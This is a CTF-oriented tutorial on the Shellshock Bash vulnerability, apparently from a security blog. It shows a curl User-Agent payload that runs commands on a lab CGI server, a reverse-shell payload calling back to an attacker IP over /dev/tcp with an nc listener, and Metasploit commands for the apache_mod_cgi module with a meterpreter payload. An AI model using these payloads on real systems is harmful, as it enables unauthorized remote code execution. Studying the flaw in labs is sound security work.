Shellshock, a vulnerability that enables attackers to execute arbitrary code through the Unix Bash shell remotely, was one of the most serious flaws discovered in the recent decade.
Shellshock remains a serious hazard, particularly for unpatched systems. It affects the majority of Linux and UNIX-based operating systems. This vulnerability is now present in many CTF Challenges, thus, this article might assist you in finding a technique to attack it.
What is the Mechanism of this Vulnerability?
It is a security flaw in the Unix Bash shell that permits Bash to mistakenly execute bash commands from environment variables. The flaw is caused by BASH erroneously executing trailing instructions when importing a function definition contained in an environment variable. If an attacker can modify the environment variable list, he or she may run arbitrary commands on the system or exploit other flaws in Bash’s command interpreter.
To test the vulnerability, we must make a curl request to the target system and verify that we have obtained the “id” of the current user.
root@kali:~# curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://192.168.175.10/cgi-bin/cgi-file.cgi
uid=33(www-data) gid=33(www-data) groups=33(www-data)
This trick works! We were successful in changing the environment variable and running the “id” command. We may open a reverse shell using the same method.
root@kali:~# curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.175.20/9000 0>&1' http://192.168.175.10/cgi-bin/cgi-file.cgi
Of course, you need to have a listening port. In this case 9000.
nc -lvnp 9000
On the remote system, the User-Agent value used in curl is saved as an environment variable. When using curl, this is set to HTTP USER AGENT = curl/7.47.0 by default. This value, however, may be changed. This environment variable may be used to contain malicious code that creates a reverse shell.
Metasploit-based exploitation
Metasploit may likewise be used to accomplish the same aim. Using the search function, we can quickly find exploits. We have numerous vulnerabilities, however the one we want is the apache mod cgi exploit. Here are the metasploit commands:
└─# msf6 > search shellshock
└─# use exploit/multi/http/apache_mod_cgi_bash_env_exec
└─# set payload linux/x86/meterpreter/reverse_tcp
└─# show options
└─# set RHOST 192.168.175.10
└─# set TARGETURI /cgi-bin/shellshock.cgi
└─# run